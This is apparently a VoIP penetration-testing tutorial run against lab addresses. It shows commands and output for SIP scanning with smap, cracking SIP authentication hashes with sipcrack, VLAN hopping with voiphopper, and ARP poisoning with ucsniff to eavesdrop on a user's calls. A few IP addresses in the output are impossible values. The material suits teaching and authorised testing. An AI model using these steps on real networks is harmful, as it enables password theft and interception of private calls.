1. Scanning and enumeration phase

Lets use smap against PBX server. Smap can scan a single IP or a subnet of IP addresses for SIP enabled devices.
root@bt: /pentest/voip/smap # .smap/ -O 192.168.1.130
smap 0.6.0  mn@123.org http:/www.sitename.com
192.168.1.130 : ICMP reachable, SIP enabled
Best guess (55% sure) fingerprint:
	Asterisk PBX (unknown version)
	User Agent Asterisk PBX 1.6.0.15-FONCORE-r78
1  host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

To scan a single host, we will be using the commands below :

root@bt:/pentest/voip/smap# ./smap 192.168.1.104
smap 0.6.0  http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
Scanning a range of IP addresses:
root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24
smap 0.6.0  http://www.wormulon.net/
192.168.1.20: ICMP reachable, SIP enabled
192.168.1.22: ICMP reachable, SIP enabled
192.168.1.0: ICMP unreachable, SIP disabled
192.168.1.1: ICMP unreachable, SIP disabled
192.168.1.2: ICMP unreachable, SIP disabled
192.168.1.3: ICMP unreachable, SIP disabled
----EDIT---
192.168.1.250: ICMP unreachable, SIP disabled
192.168.1.251: ICMP unreachable, SIP disabled
192.168.1.252: ICMP unreachable, SIP disabled
192.168.1.253: ICMP unreachable, SIP disabled
192.168.1.254: ICMP unreachable, SIP disabled
192.168.1.255: ICMP unreachable, SIP disabled

256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)

We can use SMAP to fingerprint the server/client type and version as shown below: 
root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104
smap 0.6.0  http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint:
  Asterisk PBX SVN-trunk-r56579
  User-Agent: Asterisk PBX

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

-----------------------------------------------------------------------------
2. Yielding passwords

We will dump this authentication file auth.pcap using a tool called sipdump which is a part of sipcrack suite.
root@bt:/pentest/voip/sipcrack# ./sipdump auth.txt p auth.pcap
* Using pcap file auth.pcap for sniffing
* Starting to sniff with packet filter tcp or udp or vlan

* Dumped login from 192.168.1.130  ? 192.168.1.132 (User 100)
* Dumped login from 192.168.1.130  ? 192.168.1.132 (User 100)

* Exiting sniffed 2 logins

We will now use sipcrack tool to crack the authentication hashes using a custom word list to guess the hashes. Results from this activity will be stored in file named auth.txt
root@bt:/pentest/voip/sipcrack# ./sipcrack auth.txt w wordlist.txt
* Found accounts
Num		Server		Client		User		Hash/Password
1	 192.468.1.132	         192.468.1.130	100	266985602b32305ac254d2087c...
2	192.468.1.132	         192.468.1.130	100	5241a520b547852e2581b2323a...
3	192.468.1.132	         192.468.1.130	100	e54b78d854126ba4587a4150b1...
Select which entry to crack (1 - 3)  : 1
* Generating static md5 hash. . .  cae5479224126b852e2581 
* Starting brute force against user 100 md5 (266985602b32305ac254d2087)
* Loaded wordlist:  wordlist.txt
* Starting brute force against user 100 md5 (266985602b32305ac254d2087)
* Tried 48 passwords in 0 seconds
* Found password:  123
* Updating dump file  auth.txt . . .done
--------------------------------------------------------------------------------

3. VLAN Hopping

Trace the following path to get into voiphopper.
root@bt:/pentest/voip/voiphopper#
root@bt:/pentest/voip/voiphopper# ./voiphopper
voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID>
Please specify 1 base option mode:
CDP Sniff Mode (-c 0)
Example:  voiphopper -i eth0 -c 0
CDP Spoof Mode with custom packet (-c 1):
-D  (Device ID)
-P  (Port ID)
-C  (Capabilities)
-L  (Platform)
-S  (Software)
-U  (Duplex)
Example:  voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
CDP Spoof Mode with pre-made packet (-c 2)
Example:  voiphopper -i eth0 -c 2
Avaya DHCP Option Mode (-a):
Example:  voiphopper -i eth0 -a
VLAN Hop Mode (-v VLAN ID):
Example:  voiphopper -i eth0 -v 200
Nortel DHCP Option Mode (-n):
Example:  voiphopper -i eth0 -n


root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20

eth0.20   Link encap:Ethernet  HWaddr 00:0c:29:84:98:b2
          inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:2274 (2.2 KB)
-----------------------------------------------------------------------------------

4. VoIP MAC spoofing

Ucsniff have the capability to identify MAC automatically, but just in case if we wish  to identify MAC separately, we can use nmap as shown below.
root@bt: #nmap 192.168.1.132
Starting nmap 5.51 (http://nmap.org) at 2013-08-06 14:28 
Nmap scan report for 192.168.1.132
Host is up (0.000028s latency) 
Not shown : 992 closed ports
PORT 		STATE 		SERVICE
135/tcp		open		msrpc
139/tcp		open		netbios-ssn
1433/tcp	open		ms-sql-s
9535/tcp	open		man
9593/tcp	open		cbas
9594/tcp	open		sgsys
9595/tcp	open		pds
MAC address : 00:15:DB:10:D4:B0 (Intel corporation)
Nmap done : 1 IP address (1 host is up) scanned in 1.53seconds


root@bt:/pentest/voip/ucsniff 8.10# ucsniff i eth0 T
ucsniff 8.10 starting
Displaying the discovered targets list
Extension 		Name 			IP			Protocol
100			User A			192.168.1.132		sip
102			User B			192.168.1.133		sip

Please select one endpoint (1 - 2) from the discovered targeted list
1
Target selected for input user eavesdropping.
100			User A			192.168.1.132		sip
Listening on eth0 ...    (Ethernet)
Eth 0		00:0c:28:F7:6d:71	192.1683.1.133		255.255.255.0
Randomizing 255 hosts for scanning...
* |...................................................................................>|  100.00%
3 hosts added to the host list...
3 hosts saved to arpsaver.txt...
ARP poisoning victims
GROUP 1 : 192.168.1.132 00:15:DB:10:D4:B0
GROUP 2 : ANY (All of the hosts in the list)
Starting unified sniffing...
Warning : Please ensure you hit q when you are finished with this program.
Warning : q re-ARPs the victim. Failure to do so before program exit will result in DoS.
Listening for new calls to and from target User A (extension 100, IP 192.168.1.132)
-------------------------------------------------------------------------------------------------
